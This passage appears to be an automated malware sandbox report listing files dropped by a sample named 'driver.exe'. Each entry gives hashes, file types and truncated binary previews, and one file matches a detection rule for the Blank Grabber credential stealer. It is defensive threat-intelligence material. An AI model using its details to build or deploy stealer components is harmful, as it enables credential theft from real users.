                                                                                                                                                                                                                                              SHA-512:8820D297AEDA5A5EBE1306E7664F7A95421751DB60D71DC20DA251BCDFDC73F3FD0B22546BD62E62D7AA44DFE702E4032FE78802FB16EE6C2583D65ABC891CBF
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iV...8...8...8..p....8.t9...8.p9...8...9...8.t=...8.t<...8.t;...8.1t<...8.1t;...8.1t8...8.1t:...8.Rich..8.........................PE..d...Sh.c.........." ...".@................................................................`.....................................................................P.......................................................@...........................................UPX0....................................UPX1.....@.......<..................@...UPX2.................@..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\driver.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):227096
                                                                                                                                                                                                                                              Entropy (8bit):7.928768674438361
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6144:PpEswYxCQyTp2Z/3YUtoQe5efEw+OXDbM3nFLQdFM4mNJQ:PpAqo92h3Y660Ew+OTbAFLQd2lw
                                                                                                                                                                                                                                              MD5:B2E766F5CF6F9D4DCBE8537BC5BDED2F
                                                                                                                                                                                                                                              SHA1:331269521CE1AB76799E69E9AE1C3B565A838574
                                                                                                                                                                                                                                              SHA-256:3CC6828E7047C6A7EFF517AA434403EA42128C8595BF44126765B38200B87CE4
                                                                                                                                                                                                                                              SHA-512:5233C8230497AADB9393C3EE5049E4AB99766A68F82091FE32393EE980887EBD4503BF88847C462C40C3FC786F8D179DAC5CB343B980944ADE43BC6646F5AD5A
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l.>..|m..|m..|m.u.m..|m+.}l..|m.u}l..|m+..l..|m+.xl..|m+.yl..|m..}l..|m..}m..|m..xl..|m..|l..|m...m..|m..~l..|mRich..|m................PE..d......f.........." ...(.....P...... z....................................................`............................................,C......8............ ...M.................................................. ...@...........................................UPX0....................................UPX1................................@....rsrc....P.......L..................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\driver.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):1850360
                                                                                                                                                                                                                                              Entropy (8bit):7.9939340697016155
                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                              SSDEEP:49152:VfOZocB9lcRar86XqS2fUbe1F6lRiPp3UdwT6m5FmZ9UTCO:VYB9GRag6kfQe1kyx3UdzscZk
                                                                                                                                                                                                                                              MD5:9A3D3AE5745A79D276B05A85AEA02549
                                                                                                                                                                                                                                              SHA1:A5E60CAC2CA606DF4F7646D052A9C0EA813E7636
                                                                                                                                                                                                                                              SHA-256:09693BAB682495B01DE8A24C435CA5900E11D2D0F4F0807DAE278B3A94770889
                                                                                                                                                                                                                                              SHA-512:46840B820EE3C0FA511596124EB364DA993EC7AE1670843A15AFD40AC63F2C61846434BE84D191BD53F7F5F4E17FAD549795822BB2B9C792AC22A1C26E5ADF69
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........F.r.'.!.'.!.'.!.. .'.!.z!.'.!.. .'.!.. .'.!.. .'.!._.!.'.!... .'.!.'.!N&.!F.. -'.!F.. .'.!F.x!.'.!F.. .'.!Rich.'.!........PE..d....WOg.........." ...*.0.......0J..]e..@J..................................Pf...........`.........................................H.e......ye......pe......P]..............Gf.,............................je.(...Pje.@...........................................UPX0.....0J.............................UPX1.....0...@J..,..................@....rsrc........pe......0..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\driver.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):630736
                                                                                                                                                                                                                                              Entropy (8bit):6.409476333013752
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12288:3lPCcFDlj+gV4zOifKlOWVNcjfQww0S5JPgdbBC9qxbYG9Y:3lPCcvj+YYrfSOWVNcj1JS5JPgdbBCZd
                                                                                                                                                                                                                                              MD5:9C223575AE5B9544BC3D69AC6364F75E
                                                                                                                                                                                                                                              SHA1:8A1CB5EE02C742E937FEBC57609AC312247BA386
                                                                                                                                                                                                                                              SHA-256:90341AC8DCC9EC5F9EFE89945A381EB701FE15C3196F594D9D9F0F67B4FC2213
                                                                                                                                                                                                                                              SHA-512:57663E2C07B56024AAAE07515EE3A56B2F5068EBB2F2DC42BE95D1224376C2458DA21C965AAB6AE54DE780CB874C2FC9DE83D9089ABF4536DE0F50FACA582D09
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........@.a.@.a.@.a..v..F.a..v....a..v..M.a..J..B.a.{.b.H.a.{.d.j.a.{.e.U.a.I..K.a.@.`...a..d...a....A.a..c.A.a.Rich@.a.................PE..d....~.^.........."..........2.................@.............................p.......4....`..................................................]..x.......Xy......pD...`...?...`..........T...................x...(.......................@............................text...C........................... ..`.rdata..:p.......r..................@..@.data............2...b..............@....pdata..pD.......F..................@..@.tls................................@....rsrc...Xy.......z..................@..@.reloc.......`.......V..............@..B................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\driver.exe
                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):456
                                                                                                                                                                                                                                              Entropy (8bit):4.447296373872587
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12:Bn9j9sxpCDPxfhKLiaE5cNH0u/OCIhjWO:B9jiWDpf025cNU7CIEO
                                                                                                                                                                                                                                              MD5:4531984CAD7DACF24C086830068C4ABE
                                                                                                                                                                                                                                              SHA1:FA7C8C46677AF01A83CF652EF30BA39B2AAE14C3
                                                                                                                                                                                                                                              SHA-256:58209C8AB4191E834FFE2ECD003FD7A830D3650F0FD1355A74EB8A47C61D4211
                                                                                                                                                                                                                                              SHA-512:00056F471945D838EF2CE56D51C32967879FE54FCBF93A237ED85A98E27C5C8D2A39BC815B41C15CAACE2071EDD0239D775A31D1794DC4DBA49E7ECFF1555122
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                              • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rarreg.key, Author: Joe Security
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:RAR registration data.Blank-c.Stealer License.UID=e7ae0ee11c8703113d95.64122122503d95ca34668bc2ffb72bcf8579be24bc20f3cd84baaf.afcf62e30badf158ad0c60feb872189f288e79eb40c28ca0ab6407.3a46f47624f80a44a0e4d71ef4224075bf9e28fce340a29099d287.15690be6b591c3bb355e99d6d1b8ffcd69602cb8aaa6dedf268c83.55c1fb90c384a926139625f6c0cbfc57a96996fdb04075bf9e28fc.e340a29067e9237e333577d2c7f3ed1d0f63287f74c9e50c60d76d.b5915ff59f78103d48e0826658d72ba8813da4a649711057613203.
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\driver.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):27640
                                                                                                                                                                                                                                              Entropy (8bit):7.429887403983581
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:768:DaWVMhw2pYjGIm9GtaJyUFRYT2Ip4HCxf1mlzzTz:OKE4jGIm9GtmyUzR9YfIPv
                                                                                                                                                                                                                                              MD5:933DA5361079FC8457E19ADAB86FF4E0
                                                                                                                                                                                                                                              SHA1:51BCCF47008130BAADD49A3F55F85FE968177233
                                                                                                                                                                                                                                              SHA-256:ADFDF84FF4639F8A921B78A2EFCE1B89265DF2B512DF05CE2859FC3CC6E33EFF
                                                                                                                                                                                                                                              SHA-512:0078CD5DF1B78D51B0ACB717E051E83CB18A9DAF499A959DA84A331FA7A839EEFA303672D741B29FF2E0C34D1EF3F07505609F1102E9E86FAB1C9FD066C67570
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Ks{.*.(.*.(.*.(.R.(.*.(..).*.(..).*.(..).*.(..).*.(w..).*.(.*.(.*.(...).*.(w..).*.(w..).*.(w..(.*.(w..).*.(Rich.*.(................PE..d....WOg.........." ...*.0..........@.....................................................`......................................... ...L....................`..............l.......................................P...@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\driver.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):661360
                                                                                                                                                                                                                                              Entropy (8bit):7.993016249967087
                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                              SSDEEP:12288:fnhOhXqE88i5E+P5p6YOU7hN8QtcsWO4qlD0kHpM7rLXF81PrtKtD1Gj40QeqG+e:fnWaI6lP5+whKQusF44ZQ3sZKt1n0QC/
                                                                                                                                                                                                                                              MD5:FF62332FA199145AAF12314DBF9841A3
                                                                                                                                                                                                                                              SHA1:714A50B5351D5C8AFDDB16A4E51A8998F976DA65
                                                                                                                                                                                                                                              SHA-256:36E1C70AFC8AD8AFE4A4F3EF4F133390484BCA4EA76941CC55BAC7E9DF29EEFD
                                                                                                                                                                                                                                              SHA-512:EEFF68432570025550D4C205ABF585D2911E0FF59B6ECA062DD000087F96C7896BE91EDA7612666905445627FC3FC974AEA7C3428A708C7DE2CA14C7BCE5CCA5
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s...7.x.7.x.7.x.>..;.x.&(y.5.x.&({.3.x.&(|.?.x.&(}.:.x.E/y.4.x.7.y...x..(p.6.x..(x.6.x..(..6.x..(z.6.x.Rich7.x.........................PE..d....WOg.........." ...*.....0............................................................`..............................................#..............................................................................@...........................................UPX0....................................UPX1................................@....rsrc....0.......0..................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\driver.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):1016584
                                                                                                                                                                                                                                              Entropy (8bit):6.669319438805479
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24576:VkmZDEMHhp9v1Ikbn3ND0TNVOsIut8P4zmxvSZX0yplkA:mmZFHhp9v1Io3h0TN3pvkA
                                                                                                                                                                                                                                              MD5:0E0BAC3D1DCC1833EAE4E3E4CF83C4EF
                                                                                                                                                                                                                                              SHA1:4189F4459C54E69C6D3155A82524BDA7549A75A6
                                                                                                                                                                                                                                              SHA-256:8A91052EF261B5FBF3223AE9CE789AF73DFE1E9B0BA5BDBC4D564870A24F2BAE
                                                                                                                                                                                                                                              SHA-512:A45946E3971816F66DD7EA3788AACC384A9E95011500B458212DC104741315B85659E0D56A41570731D338BDF182141C093D3CED222C007038583CEB808E26FD
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........W..l9F.l9F.l9F...F.l9F.l8F.l9F...F.l9F..9G.l9F..:G.l9F..<G.l9F..7G.n9F..=G.l9F...F.l9F..;G.l9FRich.l9F........PE..d.....}X.........." .........`............................................................`A................................................p......................F...=......p...PX..T............................'...............O...............................text............................... ..`.rdata..<u.......v..................@..@.data....$...........r..............@....pdata.............................@..@.rsrc................4..............@..@.reloc..p............:..............@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\driver.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):269032
                                                                                                                                                                                                                                              Entropy (8bit):7.980717016340488
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6144:vFHvhlPKHwqcv9DqegNsKUuFLttFHg+hMrZ99hYN8khEc9v:vtJlyHwqSBqpNsKUuntFJhMF9HC84v
                                                                                                                                                                                                                                              MD5:867ECDE9FF7F92D375165AE5F3C439CB
                                                                                                                                                                                                                                              SHA1:37D1AC339EB194CE98548AB4E4963FE30EA792AE
                                                                                                                                                                                                                                              SHA-256:A2061EF4DF5999CA0498BEE2C7DD321359040B1ACF08413C944D468969C27579
                                                                                                                                                                                                                                              SHA-512:0DCE05D080E59F98587BCE95B26A3B5D7910D4CB5434339810E2AAE8CFE38292F04C3B706FCD84957552041D4D8C9F36A1844A856D1729790160CEF296DCCFC2
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b..Q&...&...&.../fY. ...7...$...7...%...7.......7...+.......%...T...$...&...i.......'.......'.....5.'.......'...Rich&...................PE..d....WOg.........." ...*.........0..0....@...................................0............`..........................................+..X....)....... .......................+..$...................................0...@...........................................UPX0.....0..............................UPX1.........@......................@....rsrc........ ......................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
